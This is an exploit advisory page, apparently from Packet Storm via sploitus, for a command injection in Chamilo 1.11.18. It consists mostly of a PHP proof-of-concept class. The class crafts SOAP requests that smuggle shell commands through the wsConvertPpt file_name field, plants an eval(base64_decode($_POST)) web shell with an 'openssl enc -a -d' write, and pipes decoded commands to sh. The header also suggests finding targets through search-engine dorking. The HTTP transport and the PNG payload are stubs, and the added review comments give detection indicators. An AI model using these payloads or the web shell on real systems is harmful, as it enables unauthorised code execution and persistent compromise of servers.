## https://sploitus.com/exploit?id=PACKETSTORM:182147
=============================================================================================================================================  
| # Title : Chamilo 1.11.18 Code Injection Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) |  
| # Vendor : https://chamilo.org/en/2023/02/03/10-new-features-in-chamilo-1-11-18/ |  
=============================================================================================================================================  
  
POC :  
  
[+] Dorking in Google or other search engine.  
  
[+] uses the CURL to Allow remote command .  
  
[+] Line 123 set your target .  
  
[+] save code as poc.php .  
  
[+] Usage : cmd => c:\www\test\php poc.php  
  
[+] PayLoad :  
  
<?php  
  
/**
 * Proof-of-concept skeleton for the command injection described in this
 * advisory (Chamilo 1.11.18), reached through the wsConvertPpt SOAP operation.
 *
 * What the listing does: it builds a SOAP envelope whose `file_name` map entry
 * carries quote, pipe and backtick characters around a caller-supplied command,
 * and addresses it to /main/webservices/additional_webservices.php.
 * NOTE(review): the vulnerable server code is not shown here; presumably
 * `file_name` is placed on a shell command line without escaping - confirm
 * against the vendor fix.
 *
 * As published the class sends nothing: sendRequest() returns a fixed string
 * and injectPhpPayloadPng() returns placeholder bytes.
 *
 * Review/detection notes grounded in the strings below:
 *  - POSTs to additional_webservices.php with `wsConvertPpt` in the body and
 *    shell metacharacters inside the `file_name` value;
 *  - `.php` files appearing under /main/inc/lib/ppt2png/, a path this PoC
 *    later requests directly;
 *  - the web server account spawning `sh` or `openssl enc -a -d`.
 * Mitigation: apply the vendor's fixed release (version not stated on this
 * page) and restrict who can reach the webservices endpoint.
 */
class ChamiloExploit {  
// Base URL of the Chamilo instance; the constructor strips trailing slashes.
private $targetUri;  
// File name used for the dropped PHP file (caller-supplied or random).
private $webshellName;  
// Name of the POST field the dropped file reads; set only by uploadWebshell().
private $postParam;  
  
/**
 * Stores the base URL and the file name to use.
 *
 * @param string      $targetUri Base URL; trailing "/" characters are removed.
 * @param string|null $webshell  File name to use. Because `?:` tests
 *                               truthiness, null, '' and '0' all fall back to
 *                               a random name.
 */
public function __construct($targetUri, $webshell = null) {  
$this->targetUri = rtrim($targetUri, '/');  
$this->webshellName = $webshell ?: $this->generateRandomWebshellName();  
}  
  
/**
 * Returns 16 random hex characters followed by ".php".
 *
 * The name is unpredictable, so detection should key on the directory and
 * extension of new files rather than on a fixed file name.
 */
private function generateRandomWebshellName() {  
return bin2hex(random_bytes(8)) . '.php';  
}  
  
/**
 * Builds the SOAP 1.1 envelope for a wsConvertPpt call.
 *
 * The map sent as param0 has three entries: an empty `file_data`, a
 * `file_name` that embeds $cmd between shell metacharacters, and a
 * `service_ppt2lp_size` of the form "<width>x<height>" with randomised numbers.
 * $cmd is interpolated as-is; no XML escaping is applied to it. The ns1
 * namespace is set to the target base URL.
 *
 * @param string $cmd Text placed inside the `file_name` value.
 * @return string The envelope as a string.
 */
private function soapRequest($cmd) {  
// Width 720-1440 and height 360-720, so the size field differs per request.
$pptSize = rand(720, 1440) . 'x' . rand(360, 720);  
return <<<EOS  
<?xml version="1.0" encoding="UTF-8"?>  
<SOAP-ENV:Envelope  
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"  
xmlns:ns1="{$this->targetUri}"  
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"  
xmlns:xsd="http://www.w3.org/2001/XMLSchema"  
xmlns:ns2="http://xml.apache.org/xml-soap"  
xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"  
SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">  
<SOAP-ENV:Body>  
<ns1:wsConvertPpt>  
<param0 xsi:type="ns2:Map">  
<item>  
<key xsi:type="xsd:string">file_data</key>  
<value xsi:type="xsd:string"></value>  
</item>  
<item>  
<key xsi:type="xsd:string">file_name</key>  
<value xsi:type="xsd:string">`{{}}`.pptx'|" |{$cmd}||a #</value>  
</item>  
<item>  
<key xsi:type="xsd:string">service_ppt2lp_size</key>  
<value xsi:type="xsd:string">{$pptSize}</value>  
</item>  
</param0>  
</ns1:wsConvertPpt>  
</SOAP-ENV:Body>  
</SOAP-ENV:Envelope>  
EOS;  
}  
  
/**
 * Builds the request that would write a PHP file on the target through the
 * injected command, and passes it to sendRequest().
 *
 * The written file evaluates base64-decoded content from a randomly named POST
 * field, so neither the file name nor the field name is a stable indicator.
 *
 * @return string|null Whatever sendRequest() returns, or null when the PNG
 *                     helper yields null.
 */
public function uploadWebshell() {  
// Random 8-hex-character field name, remembered for executePhp().
$this->postParam = bin2hex(random_bytes(4));  
  
$phpPayload = "<?php @eval(base64_decode(\$_POST['{$this->postParam}']));?>";  
$pngWebshell = $this->injectPhpPayloadPng($phpPayload);  
  
if ($pngWebshell === null) {  
return null;  
}  
  
// The bytes travel base64-encoded and are decoded on the target with openssl;
// the output is redirected to a relative path, i.e. the working directory of
// the injected command.
$payload = base64_encode($pngWebshell);  
$cmd = "echo {$payload}|openssl enc -a -d > ./{$this->webshellName}";  
  
$response = $this->sendRequest('POST', "/main/webservices/additional_webservices.php", "text/xml; charset=utf-8", $this->soapRequest($cmd));  
return $response;  
}  
  
/**
 * Placeholder: $phpPayload is ignored and a fixed pack() result is returned.
 *
 * NOTE(review): the hex literal ends in "...", which are not hex digits, so
 * this is not a usable image and pack() is expected to warn about it.
 */
private function injectPhpPayloadPng($phpPayload) {  
// Implement your logic to inject PHP payload into a PNG image  
// For demonstration purposes, we'll return a dummy PNG data  
return pack('H*', '89504E470D0A1A0A...'); // Example PNG header  
}  
  
/**
 * Builds a form POST to /main/inc/lib/ppt2png/<file name> carrying $cmd,
 * base64-encoded, in the field named by $this->postParam.
 *
 * Requests for a `.php` file under that directory are a useful log indicator.
 *
 * @param string $cmd Text to base64-encode into the form field.
 * @return string Whatever sendRequest() returns.
 */
public function executePhp($cmd) {  
$payload = base64_encode($cmd);  
$response = $this->sendRequest('POST', "/main/inc/lib/ppt2png/{$this->webshellName}", "application/x-www-form-urlencoded", [$this->postParam => $payload]);  
return $response;  
}  
  
/**
 * Wraps $cmd as base64 piped through `openssl enc -a -d` into `sh` and sends it
 * in the SOAP `file_name` field.
 *
 * On a host, this shows up as the web server account starting openssl and sh.
 *
 * @param string $cmd Command text to encode.
 * @return string Whatever sendRequest() returns.
 */
public function executeCommand($cmd) {  
$payload = base64_encode($cmd);  
$cmd = "echo {$payload}|openssl enc -a -d|sh";  
$response = $this->sendRequest('POST', "/main/webservices/additional_webservices.php", "text/xml; charset=utf-8", $this->soapRequest($cmd));  
return $response;  
}  
  
/**
 * Echoes a random 8-hex-character marker through executeCommand() and reports
 * 'Vulnerable' only when the response contains both 'wsConvertPptResponse' and
 * the marker; otherwise 'Safe'.
 *
 * NOTE(review): with the stub sendRequest() in this listing the response is
 * always 'Dummy response', so this always returns 'Safe'. That result says
 * nothing about a real installation and must not be used as a scan verdict.
 *
 * @return string 'Vulnerable' or 'Safe'.
 */
public function check() {  
$marker = bin2hex(random_bytes(4));  
$res = $this->executeCommand("echo {$marker}");  
if ($res && strpos($res, 'wsConvertPptResponse') !== false && strpos($res, $marker) !== false) {  
return 'Vulnerable';  
} else {  
return 'Safe';  
}  
}  
  
/**
 * Dispatches on $payload['type'].
 *
 * 'php' writes the PHP file and then posts $payload['encoded'] to it;
 * 'unix_cmd' sends $payload['encoded'] through executeCommand();
 * 'linux_dropper' is an empty branch. There is no default case, so any other
 * type does nothing and raises no error.
 *
 * @param array $payload Reads the keys 'type' and 'encoded'.
 * @throws Exception When the upload response is empty or lacks
 *                   'wsConvertPptResponse' (always the case with the stub
 *                   sendRequest() in this listing).
 */
public function exploit($payload) {  
switch ($payload['type']) {  
case 'php':  
$res = $this->uploadWebshell();  
if (!$res || strpos($res, 'wsConvertPptResponse') === false) {  
throw new Exception('Web shell upload error.');  
}  
$this->executePhp($payload['encoded']);  
break;  
case 'unix_cmd':  
$this->executeCommand($payload['encoded']);  
break;  
case 'linux_dropper':  
// Implement Linux dropper logic  
break;  
}  
}  
  
/**
 * Stub transport: every argument is ignored and no request is made.
 *
 * @return string Always the literal 'Dummy response'.
 */
private function sendRequest($method, $uri, $ctype, $data) {  
// Implement your HTTP request logic here (using cURL or similar)  
// For demonstration purposes, return a dummy response  
return 'Dummy response';  
}  
}  
  
// Usage: construct the class with the hard-coded example URL and file name,
// then call check().
// NOTE(review): the string returned by check() is discarded, so this script
// prints nothing; with the stub transport in the class it also sends nothing.
$poc = new ChamiloExploit('http://target.com', 'webshell.php');
$poc->check();
  
  
  
Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================